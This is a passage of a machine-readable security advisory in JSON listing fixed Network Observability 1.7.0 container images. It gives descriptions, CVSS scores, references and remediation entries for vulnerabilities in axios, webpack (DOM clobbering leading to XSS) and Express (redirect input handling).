"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: axios: Server-Side Request Forgery"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
